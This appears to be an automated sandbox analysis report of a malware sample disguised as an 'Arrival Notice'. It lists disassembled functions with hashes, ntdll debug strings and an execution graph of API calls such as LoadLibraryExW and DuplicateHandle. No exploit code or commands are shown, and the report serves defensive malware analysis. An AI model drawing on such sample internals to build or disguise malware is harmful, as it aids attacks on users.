                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c901eadf53ea08e55180301ec47573158d395f945c498c3968153ec28adf6a3a
                                                                              • Instruction ID: 115b949022054c1f699773aca08d775fb17994c8243ddd6d74ea0d99e823a523
                                                                              • Opcode Fuzzy Hash: c901eadf53ea08e55180301ec47573158d395f945c498c3968153ec28adf6a3a
                                                                              • Instruction Fuzzy Hash: 9690022130140406D102759D48146060049E7D1755F99C416E1424955DC6668A53A232
                                                                              Function 015B2EE0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 312a869fa733fe860a179d19dc458dab31b4bee5260c76b5e0a047cfe594ea74
                                                                              • Instruction ID: 9008061171d8ec44ba6de810396f5fe5292e2faba51d24a0d26189a6f4ad4c9b
                                                                              • Opcode Fuzzy Hash: 312a869fa733fe860a179d19dc458dab31b4bee5260c76b5e0a047cfe594ea74
                                                                              • Instruction Fuzzy Hash: 3590026120180407D140799D4C046070045A7D0712F59C415A2064955ECA6A8D516235
                                                                              Function 015B2E80 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe4d07ebdc781cc8b442759cbaa522e1dbbcb87ff847a8f2e564abd3e1fd5c66
                                                                              • Instruction ID: e6cb7c986f0acb9dedff162880add51d0ca0a9ec406eb394a88e550e4ef930f2
                                                                              • Opcode Fuzzy Hash: fe4d07ebdc781cc8b442759cbaa522e1dbbcb87ff847a8f2e564abd3e1fd5c66
                                                                              • Instruction Fuzzy Hash: B590022160140506D101759D4804616004AA7D0651F99C426A1024955ECA668A92A231
                                                                              Function 015B2EA0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d180db77d08a8604bf0be5857c7dc2b8a4e46fc03c1b1137438261a9cd00b6cc
                                                                              • Instruction ID: ec3cd42797eb485048d30d88e9a538fadee9b3738b7816c18df2fe4141ba329a
                                                                              • Opcode Fuzzy Hash: d180db77d08a8604bf0be5857c7dc2b8a4e46fc03c1b1137438261a9cd00b6cc
                                                                              • Instruction Fuzzy Hash: 9E90027120140406D140759D48047460045A7D0711F59C415A5064954EC69A8ED56765
                                                                              Function 015B3010 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: af1cbb99dba1515c841841c6f6ceef33a05dfcb98cd69c9e3fe07ac45a9f5457
                                                                              • Instruction ID: 9f1967f865f8ba18329c7cdc98ba8b76b0e7368f62468e4c122409d11259633b
                                                                              • Opcode Fuzzy Hash: af1cbb99dba1515c841841c6f6ceef33a05dfcb98cd69c9e3fe07ac45a9f5457
                                                                              • Instruction Fuzzy Hash: CC90022120184446D140769D4C04B0F4145A7E1612F99C41DA4156954CC95689555721
                                                                              Function 015B3090 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 71857e7fab6f6527a71be0ca0f56d9d87551c79cfd3426868a4d702536af8112
                                                                              • Instruction ID: 120daaa2bcff8adb8a2b252dc845124100ea60ebb8a22f47714b061f720dde27
                                                                              • Opcode Fuzzy Hash: 71857e7fab6f6527a71be0ca0f56d9d87551c79cfd3426868a4d702536af8112
                                                                              • Instruction Fuzzy Hash: DF90022124140806D140759D88147070046E7D0A11F59C415A0024954DC6578A6567B1
                                                                              Function 015B39B0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 850a1316647dcf65f9c237c2dcf2d8d8c8f5b8b9c7d8e24fddb5fdd7bbe76ee9
                                                                              • Instruction ID: b675750a5b7c81157255025ff9a9ec6fa090a37b48d049a79b65c64841cba17c
                                                                              • Opcode Fuzzy Hash: 850a1316647dcf65f9c237c2dcf2d8d8c8f5b8b9c7d8e24fddb5fdd7bbe76ee9
                                                                              • Instruction Fuzzy Hash: F990022124545106D150759D48046164045B7E0611F59C425A0814994DC59689556321
                                                                              Function 015B3D70 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 60603113aa0b5411dba44915a2c8bd83908995d4738259700bd098d6ab25f545
                                                                              • Instruction ID: fe722ef45e90dc2dfc7c11785a34788ead0f9997518386aab17e45dd410ff69e
                                                                              • Opcode Fuzzy Hash: 60603113aa0b5411dba44915a2c8bd83908995d4738259700bd098d6ab25f545
                                                                              • Instruction Fuzzy Hash: 9E90023520140406D510759D5C046460086A7D0711F59D815A0424958DC69589A1A221
                                                                              Function 015B3D10 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ab046eb9544a0516d2c6a272e96172297cfcf34cdae16bd78e1d573f5218f760
                                                                              • Instruction ID: 46c98c3e114d3ded14fb91eb211855548fbeb30ecf6d44e62e90898b99c390f1
                                                                              • Opcode Fuzzy Hash: ab046eb9544a0516d2c6a272e96172297cfcf34cdae16bd78e1d573f5218f760
                                                                              • Instruction Fuzzy Hash: 54900231202401469540769D5C04A4E4145A7E1712B99D819A0015954CC95589615321
                                                                              Function 015B2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction ID: c9fe3a98c54cfe70088fc24f8fa2d8c170b4a191a13e604ac2e8d9aec6ad448c
                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction Fuzzy Hash:
                                                                              Function 015B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              • Opcode ID: e46c770cf7f0feb3bb708ba913f630ed604dac8146443377ded0d1e8afc9145b
                                                                              • Instruction ID: ced4f857d53951c24ebaf2f0cf68a2d70c81092753a44e75f4c6127723dd39a4
                                                                              • Opcode Fuzzy Hash: e46c770cf7f0feb3bb708ba913f630ed604dac8146443377ded0d1e8afc9145b
                                                                              • Instruction Fuzzy Hash: 1A51D8B5A00216AFCB15DFAC88D49BEFBF8BB48240B548569F469DB641D334EE5087E0
                                                                              Function 01622410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              • Opcode ID: 758cc9dac00a8143e3e25cb2e5b62403230e4d788ca8c1854c31e5982589cdbf
                                                                              • Instruction ID: fc390ad8068c5e287c176cfa9bb7c7f381ad423e6b953248e03823dcaf56d546
                                                                              • Opcode Fuzzy Hash: 758cc9dac00a8143e3e25cb2e5b62403230e4d788ca8c1854c31e5982589cdbf
                                                                              • Instruction Fuzzy Hash: A851F475A00A66AFDB31DF9CCCA097EBBF9AB44200B04845DE496DB681E774DA408B60
                                                                              Function 015A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • ExecuteOptions, xrefs: 015E46A0
                                                                              • Execute=1, xrefs: 015E4713
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015E46FC
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 015E4742
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 015E4725
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 015E4655
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 015E4787
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              • Opcode ID: f80b753b09ebcfa3340154666dcb854e807a69264f6ff05d137fc3eb11c99fda
                                                                              • Instruction ID: 2eec66c2ba833380082d96f16abcc55b21f4fe93f933b1371d8e92c5a0142584
                                                                              • Opcode Fuzzy Hash: f80b753b09ebcfa3340154666dcb854e807a69264f6ff05d137fc3eb11c99fda
                                                                              • Instruction Fuzzy Hash: FB510C31A4021A7AEF21EB68DC95FED7BF8BF58304F440099D605AF191D7729A418F50
                                                                              Function 01646940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                              • Instruction ID: 5490db210fd8a9c2dbf1a7e42db9c0d735dad270fd4ad304f06583b16316a97c
                                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                              • Instruction Fuzzy Hash: 5B020571508342AFD319DF18C890A6BBBE6FFC9704F44892DF9858B264DB31E945CB52
                                                                              Function 015BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-$0$0
                                                                              • API String ID: 1302938615-699404926
                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction ID: 8241920b243fd5b58ba335ec421d417d5ea687194f0a99765e19443f72ae9605
                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction Fuzzy Hash: AA81A270E052499EEF25CE6CC8D17FEBBB1BF45320F28465AE851AF291C7B49940CB51
                                                                              Function 016220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: %%%u$[$]:%u
                                                                              • API String ID: 48624451-2819853543
                                                                              • Opcode ID: ecefe437a9dbb1cb251bcb4b4bbe01b1aff5eb8fce92b3d469be8c4b0eb69a41
                                                                              • Instruction ID: f22ea5e4a1f9cc605b4f62d35fbf1ecbd3b14f1990ea961ee98b366ee4962923
                                                                              • Opcode Fuzzy Hash: ecefe437a9dbb1cb251bcb4b4bbe01b1aff5eb8fce92b3d469be8c4b0eb69a41
                                                                              • Instruction Fuzzy Hash: 3B21657AA0052AABDB10DF79CC54EEE7BF8EF54641F54011AEA05E7240EB30DA118BA1
                                                                              Function 0159F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RTL: Re-Waiting, xrefs: 015E031E
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015E02E7
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015E02BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                              • API String ID: 0-2474120054
                                                                              • Opcode ID: 4d4c0fac548d23e577b58a5081d407a5794730a5ff10c8b1d7426a6383142948
                                                                              • Instruction ID: 1c5f6947e480d25751c479d787b4b773511a9b7a4ba0f231a752606b9d9e3240
                                                                              • Opcode Fuzzy Hash: 4d4c0fac548d23e577b58a5081d407a5794730a5ff10c8b1d7426a6383142948
                                                                              • Instruction Fuzzy Hash: 3AE19F706047429FDB29CF28C884B6ABBE1BB88314F140A5EF5A5CF2E1D7B4D945CB52
                                                                              Function 015ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RTL: Re-Waiting, xrefs: 015E7BAC
                                                                              • RTL: Resource at %p, xrefs: 015E7B8E
                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 015E7B7F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 0-871070163
                                                                              • Opcode ID: 3cce1fa87e45a07fd067c82587af2a8f213157917703fdd4debbd92d71158185
                                                                              • Instruction ID: 6c9239b6c099f09337684d295e64e95eb72cb1d96e208d0be3bbefc30add86a1
                                                                              • Opcode Fuzzy Hash: 3cce1fa87e45a07fd067c82587af2a8f213157917703fdd4debbd92d71158185
                                                                              • Instruction Fuzzy Hash: AE41C0357407029FDB24CE29C840B6EB7E9FB88710F440A1DEA669F680EB71E8058BD1
                                                                              Function 015AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E728C
                                                                              Strings
                                                                              • RTL: Re-Waiting, xrefs: 015E72C1
                                                                              • RTL: Resource at %p, xrefs: 015E72A3
                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 015E7294
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 885266447-605551621
                                                                              • Opcode ID: ebc3caac90bca813d3f6c7119089d5ff67c06a627b39f0529093a9f9bf568eb9
                                                                              • Instruction ID: 6beabcdb57a44bad0d80fb9f9dbbdb9aad36baffafd9c0b6e3a335ae52e822e9
                                                                              • Opcode Fuzzy Hash: ebc3caac90bca813d3f6c7119089d5ff67c06a627b39f0529093a9f9bf568eb9
                                                                              • Instruction Fuzzy Hash: 2441D031A40203ABD725DE29CC41F6ABBE6FB98710F100A19F995EF240DB21F84287E1
                                                                              Function 01622300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: %%%u$]:%u
                                                                              • API String ID: 48624451-3050659472
                                                                              • Opcode ID: 81f3de916c414a030b1844a842e9fa9ede4ba5c4006ae9ec1f90cb21bef886c0
                                                                              • Instruction ID: d7d412129b970ed8a1c948fab1230e9b24b873d600ed3336f0f537ab20453b0e
                                                                              • Opcode Fuzzy Hash: 81f3de916c414a030b1844a842e9fa9ede4ba5c4006ae9ec1f90cb21bef886c0
                                                                              • Instruction Fuzzy Hash: 50318472A006299FDB60DE2DCC50BEEB7F8FF54610F44455AE949E7240EB30AA548FA0
                                                                              Function 015B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-
                                                                              • API String ID: 1302938615-2137968064
                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction ID: c31b3ed0165bbb7ed1015f30409ecd3ed9211c3c8ca5ff26823f2655d013780d
                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction Fuzzy Hash: DE918071E0021A9EEB24DF6DC8C16FEBBA5BFC8760F14451AE965AF2C0E73099408B55
                                                                              Function 01579126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$@
                                                                              • API String ID: 0-1194432280
                                                                              • Opcode ID: 31b13502bb314a300c3952c2ffc0d4af129876ac37d814b2a31734374e940d35
                                                                              • Instruction ID: 5f9ab76fb1cdfa531536aece7b7f408da4ae5cc9ca70efc95cc1c168661d2c07
                                                                              • Opcode Fuzzy Hash: 31b13502bb314a300c3952c2ffc0d4af129876ac37d814b2a31734374e940d35
                                                                              • Instruction Fuzzy Hash: 06811C71D0026A9BDB31DB58DC45BEEB7B4BB48714F0041DAEA1ABB250E7305E84CFA0

                                                                              Execution Graph

                                                                              Execution Coverage:8.5%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:89
                                                                              Total number of Limit Nodes:2
                                                                              execution_graph 16694 f1d040 16695 f1d086 16694->16695 16699 f1d619 16695->16699 16702 f1d628 16695->16702 16696 f1d173 16701 f1d656 16699->16701 16705 f1d27c 16699->16705 16701->16696 16703 f1d27c DuplicateHandle 16702->16703 16704 f1d656 16703->16704 16704->16696 16706 f1d690 DuplicateHandle 16705->16706 16707 f1d726 16706->16707 16707->16701 16708 f14668 16709 f1467a 16708->16709 16710 f14686 16709->16710 16714 f14778 16709->16714 16719 f13e34 16710->16719 16712 f146a5 16715 f1479d 16714->16715 16723 f14888 16715->16723 16727 f14878 16715->16727 16720 f13e3f 16719->16720 16735 f15c44 16720->16735 16722 f17048 16722->16712 16725 f148af 16723->16725 16724 f1498c 16725->16724 16731 f144b4 16725->16731 16728 f14886 16727->16728 16729 f1498c 16728->16729 16730 f144b4 CreateActCtxA 16728->16730 16730->16729 16732 f15918 CreateActCtxA 16731->16732 16734 f159db 16732->16734 16736 f15c4f 16735->16736 16739 f15c64 16736->16739 16738 f170ed 16738->16722 16740 f15c6f 16739->16740 16743 f15c94 16740->16743 16742 f171c2 16742->16738 16744 f15c9f 16743->16744 16747 f15cc4 16744->16747 16746 f172c5 16746->16742 16748 f15ccf 16747->16748 16749 f185cb 16748->16749 16754 f1ac7b 16748->16754 16750 f18609 16749->16750 16758 f1cd77 16749->16758 16763 f1cd78 16749->16763 16750->16746 16768 f1acb0 16754->16768 16771 f1aca0 16754->16771 16755 f1ac8e 16755->16749 16759 f1cd99 16758->16759 16760 f1cdbd 16759->16760 16795 f1cf28 16759->16795 16799 f1cf18 16759->16799 16760->16750 16765 f1cd99 16763->16765 16764 f1cdbd 16764->16750 16765->16764 16766 f1cf28 2 API calls 16765->16766 16767 f1cf18 2 API calls 16765->16767 16766->16764 16767->16764 16775 f1ada8 16768->16775 16769 f1acbf 16769->16755 16772 f1acb0 16771->16772 16774 f1ada8 2 API calls 16772->16774 16773 f1acbf 16773->16755 16774->16773 16776 f1adb9 16775->16776 16777 f1addc 16775->16777 16776->16777 16783 f1b040 16776->16783 16787 f1b030 16776->16787 16777->16769 16778 f1afe0 GetModuleHandleW 16780 f1b00d 16778->16780 16779 f1add4 16779->16777 16779->16778 16780->16769 16784 f1b054 16783->16784 16786 f1b079 16784->16786 16791 f1a130 16784->16791 16786->16779 16788 f1b054 16787->16788 16789 f1b079 16788->16789 16790 f1a130 LoadLibraryExW 16788->16790 16789->16779 16790->16789 16792 f1b220 LoadLibraryExW 16791->16792 16794 f1b299 16792->16794 16794->16786 16797 f1cf35 16795->16797 16796 f1cf6f 16796->16760 16797->16796 16803 f1bae0 16797->16803 16800 f1cf35 16799->16800 16801 f1cf6f 16800->16801 16802 f1bae0 2 API calls 16800->16802 16801->16760 16802->16801 16804 f1baeb 16803->16804 16805 f1dc88 16804->16805 16807 f1d2dc 16804->16807 16808 f1d2e7 16807->16808 16809 f15cc4 2 API calls 16808->16809 16810 f1dcf7 16809->16810 16810->16805

                                                                              Executed Functions

                                                                              Function 00F1ADA8 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 316 f1ada8-f1adb7 317 f1ade3-f1ade7 316->317 318 f1adb9-f1adc6 call f1a0cc 316->318 319 f1ade9-f1adf3 317->319 320 f1adfb-f1ae3c 317->320 325 f1adc8 318->325 326 f1addc 318->326 319->320 327 f1ae49-f1ae57 320->327 328 f1ae3e-f1ae46 320->328 373 f1adce call f1b040 325->373 374 f1adce call f1b030 325->374 326->317 329 f1ae59-f1ae5e 327->329 330 f1ae7b-f1ae7d 327->330 328->327 333 f1ae60-f1ae67 call f1a0d8 329->333 334 f1ae69 329->334 332 f1ae80-f1ae87 330->332 331 f1add4-f1add6 331->326 335 f1af18-f1af94 331->335 336 f1ae94-f1ae9b 332->336 337 f1ae89-f1ae91 332->337 339 f1ae6b-f1ae79 333->339 334->339 366 f1afc0-f1afd8 335->366 367 f1af96-f1afbe 335->367 340 f1aea8-f1aeaa call f1a0e8 336->340 341 f1ae9d-f1aea5 336->341 337->336 339->332 345 f1aeaf-f1aeb1 340->345 341->340 347 f1aeb3-f1aebb 345->347 348 f1aebe-f1aec3 345->348 347->348 349 f1aee1-f1aeee 348->349 350 f1aec5-f1aecc 348->350 356 f1af11-f1af17 349->356 357 f1aef0-f1af0e 349->357 350->349 352 f1aece-f1aede call f1a0f8 call f1a108 350->352 352->349 357->356 368 f1afe0-f1b00b GetModuleHandleW 366->368 369 f1afda-f1afdd 366->369 367->366 370 f1b014-f1b028 368->370 371 f1b00d-f1b013 368->371 369->368 371->370 373->331 374->331
                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00F1AFFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1886670133.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_f10000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 5fca67a84ef64f855aa3d39dc8dcc24d833c29bd2a20a9f7776de5c7e38c67d2
                                                                              • Instruction ID: 71fda57c2d1b06fc1896a229bcdc1e4c4f84691e72a6dc55ff8a8381bb3fc3d9
